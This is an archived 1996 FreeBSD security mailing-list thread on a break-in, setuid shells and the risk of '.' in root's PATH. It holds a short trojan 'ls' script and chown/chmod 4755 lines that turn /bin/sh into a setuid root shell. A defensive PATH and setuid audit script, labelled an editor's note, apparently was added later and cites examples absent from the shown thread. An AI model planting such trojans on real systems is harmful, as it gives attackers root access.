From owner-freebsd-security  Mon Jun 24 23:41:40 1996
Message-Id: <199606250639.IAA08093@grumble.grondar.za>
To: -Vince-
cc: Mark Murray, hackers@FreeBSD.org, security@FreeBSD.org, Chad Shackley, jbhunt
Subject: Re: I need help on this one - please help me track this guy down!
Date: Tue, 25 Jun 1996 08:39:37 +0200
From: Mark Murray

-Vince- wrote:
> > If you do not know the basics, like setuid, you are WIDE open for this
> > kind of attack.
>
> Well, I know what a setuid is but didn't know it was called a setuid
> since it has that s in the permissions... Also, on our machine, the wheel
> group only has chad, jbhunt, vince and root and the only person who can
> login to root directly is chad at the console, we all need to su.

Ok...

> > This shell could have been created two ways (that are currently in
> > popular cracker use):
> >
> > 1) The cracker snooped your root password somehow, (digging through
> >    your desk/dustbin or by running a snooper somewhere), then created
> >    this suid shell for future use.
>
> This isn't possible since Gaianet isn't open to the public for
> people to snoop around.

Physically, OK, but electronically?

> > 2) The cracker made a trojan script somewhere (usually exploiting
> >    some admins (roots) who have "." in their path). This way he creates
> >    a script that when run as root will make him a suid program.
> >    After this he has you by tender bits.
>
> Hmmm, doesn't everyone have . as their path since all . does is allow
> someone to run stuff from the current directory...

Not root! This leaves you wide open for trojans. As root you should
have to type ./foo to run foo in the current directory.

> > There are other ways, but these are the most popular.
> >
> > For much more info, I recommend "Practical Unix Security" from
> > O'Reilly and Associates, (by Garfinkel?)
>
> I have that book but there are always ways no one knows about ;)

Sure! :-)

M
--
Mark Murray
46 Harvey Rd, Claremont, Cape Town 7700, South Africa
+27 21 61-3768 GMT+0200
Finger mark@grondar.za for PGP key

From owner-freebsd-security  Mon Jun 24 23:42:11 1996
Message-Id: <199606250641.QAA04407@amethyst.auscert.org.au>
To: guido@gvr.win.tue.nl (Guido van Rooij)
cc: danny@auscert.org.au (Danny Smith), jkh@time.cdrom.com, hackers@freebsd.org, security@freebsd.org, ache@freebsd.org
Subject: Re: No comment character in hosts.equiv
In-reply-to: Your message of "Tue, 25 Jun 1996 08:36:16 +0200." <199606250636.IAA18992@gvr.win.tue.nl>
Date: Tue, 25 Jun 1996 16:41:10 +1000
From: Danny Smith
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Guido van Rooij writes:
> Danny Smith wrote:
> -- Start of PGP encoded section.
> > (Note the change of subject line!)
> >
> > "Jordan K. Hubbard" writes:
> >
> > > Hmmm. We have reason to believe that he *didn't* get root (though
> > > we're still assuming he did, just to be paranoid) and if the mod times
> > > can be trusted, hosts.equiv hasn't been touched in many months (and
> > > localhost is commented out).
> >     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> >
> > There is no comment character in either the hosts.equiv file or the
> > .rhosts file. Use of this may allow someone to spoof DNS and gain
> > trusted access.
> >
> > Check out the code relating to calls to ruserok().
>
> Wrong. FreeBSD has a comment char. Put in before the release of 2.1.0.
> Look in usr/src/lib/libc/net/rcmd.c in __ivaliduser.

OK, I verified this on our 2.0.5 test system before mailing. Looks like I
may have been hit by the "checking the previous version" problem. I haven't
checked a 2.1.0 system, but will try and get to it tomorrow.

Danny Smith.
==========================================================================
Danny Smith                  | Fax:   +61 7 3365 4477
AUSCERT                      | Phone: +61 7 3365 4417
c/- Prentice Centre          |        (answered during business hours)
The University of Queensland |        (on call after hours for emergencies)
Qld. 4072.
Australia                    | Internet: auscert@auscert.org.au

From owner-freebsd-security Mon Jun 24 23:47:17 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA22073 for security-outgoing; Mon, 24 Jun 1996 23:47:17 -0700 (PDT)
Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA22055; Mon, 24 Jun 1996 23:47:12 -0700 (PDT)
Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id XAA01680; Mon, 24 Jun 1996 23:46:04 -0700 (PDT)
Date: Mon, 24 Jun 1996 23:46:03 -0700 (PDT)
From: -Vince-
To: Mark Murray
cc: hackers@FreeBSD.org, security@FreeBSD.org, Chad Shackley, jbhunt
Subject: Re: I need help on this one - please help me track this guy down!
In-Reply-To: <199606250639.IAA08093@grumble.grondar.za>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

On Tue, 25 Jun 1996, Mark Murray wrote:

> -Vince- wrote:
> > > If you do not know the basics, like setuid, you are WIDE open for this
> > > kind of attack.
> >
> > Well, I know what a setuid is but didn't know it was called a setuid
> > since it has that s in the permissions... Also, on our machine, the wheel
> > group only has chad, jbhunt, vince and root and the only person who can
> > login to root directly is chad at the console, we all need to su.
>
> Ok...
>
> > > This shell could have been created two ways (That are currently in
> > > popular cracker use):
> > >
> > > 1) The cracker snooped your root password somehow, (digging through
> > > your desk/dustbin or by running a snooper somewhere), then created
> > > this suid shell for future use.
> >
> > This isn't possible since Gaianet isn't open to the public for
> > people to snoop around.
>
> Physically, OK, but electronically?

Electronically is a different story.... Since there are over 1000 users on
this machine.... but we do know who hacked root access... on our other
machine earth like I mentioned earlier, one person just did ypwhich to get
root access but that was with 2.1R, -current seemed to fix this.

> > > 2) The Cracker made a trojan script somewhere (usually exploiting
> > > some admins (roots) who have "." in their path). This way he creates
> > > a script that when run as root will make him a suid program.
> > > after this he has you by tender bits.
> >
> > Hmmm, doesn't everyone have . as their path since all . does is allow
> > someone to run stuff from the current directory...
>
> Not root! This leaves you wide open for trojans. As root you should
> have to type ./foo to run foo in the current directory.

Hmmm, really? It seems like almost all systems root has . for the
path but if the directory for root is like read, write, execute by root
only, how will they get into it?

> > > There are other ways, but these are the most popular.
> > >
> > > For much more info, I recommend "Practical Unix Security" from
> > > O'Reilly and Associates, (By Garfinkel?)
> >
> > I have that book but there are always ways no one knows about ;)
>
> Sure! :-)

That's the thing like the mount_union hole, that has probably been there
for ages and other people may have been using it as a backdoor for quite
some time before it was discovered....

Vince

From owner-freebsd-security Tue Jun 25 00:01:27 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA23232 for security-outgoing; Tue, 25 Jun 1996 00:01:27 -0700 (PDT)
Received: from palmer.demon.co.uk (palmer.demon.co.uk [158.152.50.150]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA23217; Tue, 25 Jun 1996 00:01:19 -0700 (PDT)
Received: from palmer.demon.co.uk (localhost [127.0.0.1]) by palmer.demon.co.uk (sendmail/PALMER-2) with ESMTP id HAA29211; Tue, 25 Jun 1996 07:58:33 +0100 (BST)
To: -Vince-
cc: Mark Murray, hackers@FreeBSD.ORG, security@FreeBSD.ORG, Chad Shackley, jbhunt
From: "Gary Palmer"
Subject: Re: I need help on this one - please help me track this guy down!
In-reply-to: Your message of "Mon, 24 Jun 1996 23:32:55 PDT."
Date: Tue, 25 Jun 1996 07:58:32 +0100
Message-ID: <29209.835685912@palmer.demon.co.uk>
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

-Vince- wrote in message ID :
> Hmmm, doesn't everyone have . as their path since all . does is allow
> someone to run stuff from the current directory...

No, everyone does NOT have `.' in their paths! I most certainly don't,
as I know that it's ALL too easy to have someone break your system
security that way. Imagine if you are looking into something as root,
and have `.' in your path. You go into someone else's directory, and do
a `ls'. All they need is a wrapper program called `ls' in that dir
which copies /bin/sh to some directory, chowns it to root, then sets
the setuid bit, and THEN exec's ls with the arguments given, and BANG,
there goes your system security.

See the problem? It's a bit of a pain if you are doing s/w
development, but it's more than repaid in security ... It's why we put
up with the common complaint from newbies about not being able to run
programs in their current directory, as `.' isn't in root's path by
default when we ship the system.

Gary
--
Gary Palmer                                          FreeBSD Core Team Member
FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info

From owner-freebsd-security Tue Jun 25 00:13:58 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA24989 for security-outgoing; Tue, 25 Jun 1996 00:13:58 -0700 (PDT)
Received: from grumble.grondar.za (root@grumble.grondar.za [196.7.18.130]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA24973; Tue, 25 Jun 1996 00:13:50 -0700 (PDT)
Received: from grumble.grondar.za (mark@localhost.grondar.za [127.0.0.1]) by grumble.grondar.za (8.7.5/8.7.3) with ESMTP id JAA08662; Tue, 25 Jun 1996 09:12:52 +0200 (SAT)
Message-Id: <199606250712.JAA08662@grumble.grondar.za>
To: -Vince-
cc: Mark Murray, hackers@FreeBSD.org, security@FreeBSD.org, Chad Shackley, jbhunt
Subject: Re: I need help on this one - please help me track this guy down!
Date: Tue, 25 Jun 1996 09:12:50 +0200
From: Mark Murray
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

-Vince- wrote:
> > > Hmmm, doesn't everyone have . as their path since all . does is allow
> > > someone to run stuff from the current directory...
> >
> > Not root! This leaves you wide open for trojans. As root you should
> > have to type ./foo to run foo in the current directory.
>
> Hmmm, really? It seems like almost all systems root has . for the
> path but if the directory for root is like read, write, execute by root
> only, how will they get into it?

Example: user suspects you may be a DOS user, and are likely to try
to type the "dir" or "cls" command every now and then (by mistake).

In his home directory he places a script called "dir" that creates a
suid shell (silently) then prints the usual "command not found" error.

He then phones you, asking for support, and tries to trick you into
running his script. Having "." in your path makes his trickery easier.

Voila!

M
--
Mark Murray
46 Harvey Rd, Claremont, Cape Town 7700, South Africa
+27 21 61-3768 GMT+0200
Finger mark@grondar.za for PGP key

From owner-freebsd-security Tue Jun 25 00:14:45 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA25140 for security-outgoing; Tue, 25 Jun 1996 00:14:45 -0700 (PDT)
Received: from root.com (implode.root.com [198.145.90.17]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA25128; Tue, 25 Jun 1996 00:14:40 -0700 (PDT)
Received: from localhost (localhost [127.0.0.1]) by root.com (8.7.5/8.6.5) with SMTP id AAA03862; Tue, 25 Jun 1996 00:14:37 -0700 (PDT)
Message-Id: <199606250714.AAA03862@root.com>
X-Authentication-Warning: implode.root.com: Host localhost [127.0.0.1] didn't use HELO protocol
To: "Gary Palmer"
cc: -Vince-, Mark Murray, hackers@FreeBSD.ORG, security@FreeBSD.ORG, Chad Shackley, jbhunt
Subject: Re: I need help on this one - please help me track this guy down!
In-reply-to: Your message of "Tue, 25 Jun 1996 07:58:32 BST." <29209.835685912@palmer.demon.co.uk>
From: David Greenman
Reply-To: davidg@root.com
Date: Tue, 25 Jun 1996 00:14:37 -0700
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

>-Vince- wrote in message ID :
>> Hmmm, doesn't everyone have . as their path since all . does is allow
>> someone to run stuff from the current directory...
>
>No, everyone does NOT have `.' in their paths! I most certainly don't,
>as I know that it's ALL too easy to have someone break your system
>security that way. Imagine if you are looking into something as root,
>and have `.' in your path. You go into someone else's directory, and do
>a `ls'. All they need is a wrapper program called `ls' in that dir
>which copies /bin/sh to some directory, chowns it to root, then sets
>the setuid bit, and THEN exec's ls with the arguments given, and BANG,
>there goes your system security.

   Actually, this particular problem can be avoided by putting "." last in
the search path rather than first.

-DG

David Greenman
Core-team/Principal Architect, The FreeBSD Project

From owner-freebsd-security Tue Jun 25 00:25:24 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA26359 for security-outgoing; Tue, 25 Jun 1996 00:25:24 -0700 (PDT)
Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA26339; Tue, 25 Jun 1996 00:25:20 -0700 (PDT)
Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id AAA06126; Tue, 25 Jun 1996 00:25:02 -0700 (PDT)
Date: Tue, 25 Jun 1996 00:25:02 -0700 (PDT)
From: -Vince-
To: Gary Palmer
cc: Mark Murray, hackers@FreeBSD.ORG, security@FreeBSD.ORG, Chad Shackley, jbhunt
Subject: Re: I need help on this one - please help me track this guy down!
In-Reply-To: <29209.835685912@palmer.demon.co.uk>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Tue, 25 Jun 1996, Gary Palmer wrote:

> -Vince- wrote in message ID :
> > Hmmm, doesn't everyone have . as their path since all . does is allow
> > someone to run stuff from the current directory...
>
> No, everyone does NOT have `.' in their paths! I most certainly don't,
> as I know that it's ALL too easy to have someone break your system
> security that way. Imagine if you are looking into something as root,
> and have `.' in your path. You go into someone else's directory, and do
> a `ls'. All they need is a wrapper program called `ls' in that dir
> which copies /bin/sh to some directory, chowns it to root, then sets
> the setuid bit, and THEN exec's ls with the arguments given, and BANG,
> there goes your system security.
>
> See the problem? It's a bit of a pain if you are doing s/w
> development, but it's more than repaid in security ... It's why we put
> up with the common complaint from newbies about not being able to run
> programs in their current directory, as `.' isn't in root's path by
> default when we ship the system.

Hmmm, I see people don't have it at the beginning of their path but they
do for the end even on CERFNet when they talk about security, all their
defaults have . at the end..

Vince

From owner-freebsd-security Tue Jun 25 00:28:25 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA26612 for security-outgoing; Tue, 25 Jun 1996 00:28:25 -0700 (PDT)
Received: from MindBender.HeadCandy.com (root@[199.238.225.168]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA26603; Tue, 25 Jun 1996 00:28:21 -0700 (PDT)
Received: from localhost.HeadCandy.com (michaelv@localhost.HeadCandy.com [127.0.0.1]) by MindBender.HeadCandy.com (8.7.5/8.7.3) with SMTP id AAA24988; Tue, 25 Jun 1996 00:27:00 -0700 (PDT)
Message-Id: <199606250727.AAA24988@MindBender.HeadCandy.com>
X-Authentication-Warning: MindBender.HeadCandy.com: Host michaelv@localhost.HeadCandy.com [127.0.0.1] didn't use HELO protocol
To: -Vince-
cc: Mark Murray, hackers@freebsd.org, security@freebsd.org, Chad Shackley, jbhunt
Subject: Re: I need help on this one - please help me track this guy down!
In-reply-to: Your message of Mon, 24 Jun 96 23:32:55 -0700.
Date: Tue, 25 Jun 1996 00:27:00 -0700
From: "Michael L. VanLoon -- HeadCandy.com"
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

>> 2) The Cracker made a trojan script somewhere (usually exploiting
>> some admins (roots) who have "." in their path). This way he creates
>> a script that when run as root will make him a suid program.
>> after this he has you by tender bits.

> Hmmm, doesn't everyone have . as their path since all . does is allow
>someone to run stuff from the current directory...

Assume root has "." in its path. Hacker puts this little script in
his dir, maybe also in /tmp/; it's called "ls" (imagine the
coincidence), and it's executable by all:

	#!/bin/sh
	chown root /bin/sh > /dev/null 2>&1
	chmod u+s,a+x /bin/sh > /dev/null 2>&1
	ls $*

Then sits back and waits for the sysadmin to come along and type "ls"
in one of those directories.

Pop quiz: what is the result?

-----------------------------------------------------------------------------
  Michael L. VanLoon                                 michaelv@HeadCandy.com
       --<  Free your mind and your machine -- NetBSD free un*x  >--
    NetBSD working ports: 386+PC, Mac 68k, Amiga, Atari 68k, HP300, Sun3,
        Sun4/4c/4m, DEC MIPS, DEC Alpha, PC532, VAX, MVME68k, arm32...
    NetBSD ports in progress: PICA, others...

   Roll your own Internet access -- Seattle People's Internet cooperative.
                  If you're in the Seattle area, ask me how.
-----------------------------------------------------------------------------

From owner-freebsd-security Tue Jun 25 00:29:56 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA26785 for security-outgoing; Tue, 25 Jun 1996 00:29:56 -0700 (PDT)
Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA26765; Tue, 25 Jun 1996 00:29:51 -0700 (PDT)
Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id AAA06441; Tue, 25 Jun 1996 00:28:35 -0700 (PDT)
Date: Tue, 25 Jun 1996 00:28:34 -0700 (PDT)
From: -Vince-
To: Mark Murray
cc: hackers@FreeBSD.org, security@FreeBSD.org, Chad Shackley, jbhunt
Subject: Re: I need help on this one - please help me track this guy down!
In-Reply-To: <199606250712.JAA08662@grumble.grondar.za>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

On Tue, 25 Jun 1996, Mark Murray wrote:

> -Vince- wrote:
> > > > Hmmm, doesn't everyone have . as their path since all . does is allow
> > > > someone to run stuff from the current directory...
> > >
> > > Not root! This leaves you wide open for trojans. As root you should
> > > have to type ./foo to run foo in the current directory.
> >
> > Hmmm, really? It seems like almost all systems root has . for the
> > path but if the directory for root is like read, write, execute by root
> > only, how will they get into it?
>
> Example: user suspects you may be a DOS user, and are likely to try
> to type the "dir" or "cls" command every now and then (by mistake).
>
> In his home directory he places a script called "dir" that creates a
> suid shell (silently) then prints the usual "command not found" error.
>
> He then phones you, asking for support, and tries to trick you into
> running his script. Having "." in your path makes his trickery easier.

Hmmm, that's only if we had phone support.... We don't :) but do admins
really go run a program that the user said won't run?
Vince

From owner-freebsd-security Tue Jun 25 00:32:59 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA27035 for security-outgoing; Tue, 25 Jun 1996 00:32:59 -0700 (PDT)
Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA27013; Tue, 25 Jun 1996 00:32:54 -0700 (PDT)
Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id AAA06854; Tue, 25 Jun 1996 00:32:34 -0700 (PDT)
Date: Tue, 25 Jun 1996 00:32:34 -0700 (PDT)
From: -Vince-
To: David Greenman
cc: Gary Palmer, Mark Murray, hackers@FreeBSD.ORG, security@FreeBSD.ORG, Chad Shackley, jbhunt
Subject: Re: I need help on this one - please help me track this guy down!
In-Reply-To: <199606250714.AAA03862@root.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Tue, 25 Jun 1996, David Greenman wrote:

> >-Vince- wrote in message ID :
> >> Hmmm, doesn't everyone have . as their path since all . does is allow
> >> someone to run stuff from the current directory...
> >
> >No, everyone does NOT have `.' in their paths! I most certainly don't,
> >as I know that it's ALL too easy to have someone break your system
> >security that way. Imagine if you are looking into something as root,
> >and have `.' in your path. You go into someone else's directory, and do
> >a `ls'. All they need is a wrapper program called `ls' in that dir
> >which copies /bin/sh to some directory, chowns it to root, then sets
> >the setuid bit, and THEN exec's ls with the arguments given, and BANG,
> >there goes your system security.
>
>    Actually, this particular problem can be avoided by putting "." last in
> the search path rather than first.

Hmmm, that's what I've noticed is everyone having "." last on the path
and not first. My .cshrc's path is actually from ref.tfs.com when it was
the 386bsd days...
Vince

From owner-freebsd-security Tue Jun 25 00:34:29 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA27225 for security-outgoing; Tue, 25 Jun 1996 00:34:29 -0700 (PDT)
Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA27200; Tue, 25 Jun 1996 00:34:23 -0700 (PDT)
Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id AAA07004; Tue, 25 Jun 1996 00:34:00 -0700 (PDT)
Date: Tue, 25 Jun 1996 00:33:59 -0700 (PDT)
From: -Vince-
To: "Michael L. VanLoon -- HeadCandy.com"
cc: Mark Murray, hackers@freebsd.org, security@freebsd.org, Chad Shackley, jbhunt
Subject: Re: I need help on this one - please help me track this guy down!
In-Reply-To: <199606250727.AAA24988@MindBender.HeadCandy.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Tue, 25 Jun 1996, Michael L. VanLoon -- HeadCandy.com wrote:

>
> >> 2) The Cracker made a trojan script somewhere (usually exploiting
> >> some admins (roots) who have "." in their path). This way he creates
> >> a script that when run as root will make him a suid program.
> >> after this he has you by tender bits.
>
> > Hmmm, doesn't everyone have . as their path since all . does is allow
> >someone to run stuff from the current directory...
>
> Assume root has "." in its path. Hacker puts this little script in
> his dir, maybe also in /tmp/; it's called "ls" (imagine the
> coincidence), and it's executable by all:
>
> 	#!/bin/sh
> 	chown root /bin/sh > /dev/null 2>&1
> 	chmod u+s,a+x /bin/sh > /dev/null 2>&1
> 	ls $*
>
> Then sits back and waits for the sysadmin to come along and type "ls"
> in one of those directories.
>
> Pop quiz: what is the result?

Never thought about that one....
Vince

From owner-freebsd-security Tue Jun 25 00:47:28 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA27850 for security-outgoing; Tue, 25 Jun 1996 00:47:28 -0700 (PDT)
Received: from uu.elvisti.kiev.ua (acc0.elvisti.kiev.ua [193.125.28.132]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA27794 for ; Tue, 25 Jun 1996 00:45:31 -0700 (PDT)
Received: from office.elvisti.kiev.ua (office.elvisti.kiev.ua [193.125.28.129]) by uu.elvisti.kiev.ua (8.7.5/8.7.3) with ESMTP id KAA26999; Tue, 25 Jun 1996 10:57:39 +0300 (EET DST)
Received: (from stesin@localhost) by office.elvisti.kiev.ua (8.6.12/8.ElVisti) id KAA13562; Tue, 25 Jun 1996 10:57:27 +0300
From: "Andrew V. Stesin"
Message-Id: <199606250757.KAA13562@office.elvisti.kiev.ua>
Subject: Re: IPFW vs. IP Filter?
To: jc@irbs.com (John Capo)
Date: Tue, 25 Jun 1996 10:57:26 +0300 (EET DST)
Cc: taob@io.org, stesin@elvisti.kiev.ua, avalon@coombs.anu.edu.au, freebsd-security@FreeBSD.ORG
In-Reply-To: <199606240009.UAA16450@irbs.irbs.com> from "John Capo" at Jun 23, 96 08:09:08 pm
X-Mailer: ELM [version 2.4 PL24alpha5]
Content-Type: text
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

Dear John,

# Brian Tao writes:
# >
# > Do I have to unpack the source somewhere in the kernel source
# > tree? ioconf.h only exists in the /sys/compile/[...] directories.
#
# Much work needed to run it on 2.2. I can provide patches for kernel
# install if you like.

as for me, I'd be very grateful to see them, that would be really nice
to have IPfilter working on FreeBSD-current, too, not only with 2.1-like
kernels. So if you'd be so kind to share your work, I'll appreciate this
strongly. Thanks!

#
# John Capo                      jc@irbs.com
# IRBS Engineering               FreeBSD Servers and Workstations
# (954) 792-9551                 Unix/Internet Consulting - ISP Solutions
#

--
With best regards -- Andrew Stesin.

+380 (44) 2760188  +380 (44) 2713457  +380 (44) 2713560

"You may delegate authority, but not responsibility."
Frank's Management Rule #1.
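[Archive editor's note, not part of the thread.] The "." in PATH trojans (Gary Palmer's and Michael VanLoon's "ls" wrappers, Mark Murray's "dir", Joerg's /tmp scripts) and the setuid copy of /bin/sh that Poul-Henning and Joerg talk about are the two things an admin reading this thread would want to check their own box for. The POSIX shell script below is an added example written for this archive; it is not code from any poster and not part of FreeBSD. It parses a PATH value the way the shell does, reporting "." , empty and relative components together with their position (the thread argues about first versus last), generalises the same check to world-writable absolute entries such as /tmp, and lists setuid files under a directory tree. The function names and the SAMPLE_PATH value are invented for the example.

```shell
#!/bin/sh
# Added example for this thread (not from any poster, not FreeBSD code):
# defender-side checks for the PATH trojan and setuid-shell problems
# discussed above.  Function and variable names are invented here.

# audit_path PATHVALUE
# Walks PATHVALUE the way the shell does (":" separated; an empty
# component also means the current directory) and prints one line per
# problem as "position:entry:reason".  Returns 0 if clean, 1 otherwise.
# The position matters because the thread argues about "." first vs.
# last: last is less exposed, but as Joerg's /tmp example shows, a
# mistyped command still falls through to it.
audit_path() {
    _rest="$1:"    # trailing ":" so the loop also sees a final empty component
    _pos=0
    _bad=0
    while [ -n "$_rest" ]; do
        _entry="${_rest%%:*}"
        _rest="${_rest#*:}"
        _pos=$((_pos + 1))
        case "$_entry" in
            "") echo "$_pos::empty component (searches the current directory)"; _bad=1 ;;
            .)  echo "$_pos:.:current directory in PATH"; _bad=1 ;;
            /*) ;;   # absolute entry: nothing to flag at this stage
            *)  echo "$_pos:$_entry:relative entry (resolved against the current directory)"; _bad=1 ;;
        esac
    done
    return $_bad
}

# writable_path_dirs PATHVALUE
# Generalises the "." case: prints every absolute PATH entry that exists
# and is world-writable, e.g. /tmp, where anyone can drop an "ls" or "sl"
# wrapper.  Returns 0 if none was found, 1 otherwise.
writable_path_dirs() {
    _rest="$1:"
    _found=0
    while [ -n "$_rest" ]; do
        _entry="${_rest%%:*}"
        _rest="${_rest#*:}"
        case "$_entry" in
            /*)
                # -H resolves a symlinked entry (e.g. /bin -> usr/bin) instead of
                # testing the link's own mode; -prune stops find descending;
                # -perm -002 tests the other-write bit.
                if [ -d "$_entry" ] && \
                   [ -n "$(find -H "$_entry" -prune -perm -002 2>/dev/null)" ]; then
                    echo "$_entry"
                    _found=1
                fi ;;
        esac
    done
    return $_found
}

# find_setuid DIR
# Lists regular files under DIR with the setuid bit set.  A setuid copy
# of /bin/sh dropped in a home directory shows up here; run it over the
# whole system from cron and diff the output against the previous run.
find_setuid() {
    find "$1" -type f -perm -4000 -print 2>/dev/null
}

# Demonstration on a constructed PATH value (not anyone's real setting).
SAMPLE_PATH=".:/usr/local/bin:/bin:/usr/bin:/tmp:"
echo "auditing PATH=$SAMPLE_PATH"
audit_path "$SAMPLE_PATH" || echo "-> PATH contains current-directory entries"
writable_path_dirs "$SAMPLE_PATH" || echo "-> world-writable directories in PATH"
```

Running it on the sample value reports position 1 ("." itself) and position 6 (the empty component left by the trailing colon, which the shell treats exactly like "."), and on most systems lists /tmp as a world-writable PATH entry. Pointing find_setuid at / is the check for the setuid shell Poul-Henning describes; the list is only useful if you keep the previous run to diff against.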
From owner-freebsd-security Tue Jun 25 00:58:58 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA29025 for security-outgoing; Tue, 25 Jun 1996 00:58:58 -0700 (PDT)
Received: from irz301.inf.tu-dresden.de (irz301.inf.tu-dresden.de [141.76.1.11]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id AAA28544; Tue, 25 Jun 1996 00:55:16 -0700 (PDT)
Received: from sax.sax.de by irz301.inf.tu-dresden.de (8.6.12/8.6.12-s1) with ESMTP id JAA21531; Tue, 25 Jun 1996 09:53:10 +0200
Received: (from uucp@localhost) by sax.sax.de (8.6.12/8.6.12-s1) with UUCP id JAA07290; Tue, 25 Jun 1996 09:53:09 +0200
Received: (from j@localhost) by uriah.heep.sax.de (8.7.5/8.6.9) id JAA17768; Tue, 25 Jun 1996 09:52:02 +0200 (MET DST)
From: J Wunsch
Message-Id: <199606250752.JAA17768@uriah.heep.sax.de>
Subject: Re: I need help on this one - please help me track this guy down!
To: security@freebsd.org
Date: Tue, 25 Jun 1996 09:52:01 +0200 (MET DST)
Cc: core@freebsd.org (FreeBSD core team)
Reply-To: joerg_wunsch@uriah.heep.sax.de (Joerg Wunsch)
In-Reply-To: <1092.835661388@critter.tfs.com> from Poul-Henning Kamp at "Jun 24, 96 05:09:48 pm"
X-Phone: +49-351-2012 669
X-PGP-Fingerprint: DC 47 E6 E4 FF A6 E9 8F 93 21 E0 7D F9 12 D6 4E
X-Mailer: ELM [version 2.4ME+ PL17 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

As Poul-Henning Kamp wrote:

> The binary is an ordinary shell with a setuid bit.

Reminds me: many systems relinquish suidness and sgidness in a shell,
our shell doesn't. Does anybody have a good reason why we should not
do the same?

It will of course only plug the worst hole once somebody got temporary
root access, but something like

	cp /bin/sh ~/mysuidshell
	chown root ~/mysuidshell
	chmod 4755 ~/mysuidshell

as a Trojan Horse will be unusable then.

--
cheers, J"org               joerg_wunsch@uriah.heep.sax.de -- http://www.sax.de/~joerg/ -- NIC: JW11-RIPE
Never trust an operating system you don't have sources for. ;-)

From owner-freebsd-security Tue Jun 25 01:00:44 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA29331 for security-outgoing; Tue, 25 Jun 1996 01:00:44 -0700 (PDT)
Received: from ns2.harborcom.net (root@ns2.harborcom.net [206.158.4.4]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA29316 for ; Tue, 25 Jun 1996 01:00:37 -0700 (PDT)
Received: from swoosh.dunn.org (swoosh.dunn.org [206.158.7.243]) by ns2.harborcom.net (8.7.4/8.6.12) with SMTP id EAA05731; Tue, 25 Jun 1996 04:00:22 -0400 (EDT)
Message-Id: <199606250800.EAA05731@ns2.harborcom.net>
Comments: Authenticated sender is
From: "Bradley Dunn"
Organization: Harbor Communications
To: -Vince-
Date: Tue, 25 Jun 1996 03:55:55 -0500
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Subject: Re: I need help on this one - please help me track this guy
Reply-to: dunn@harborcom.net
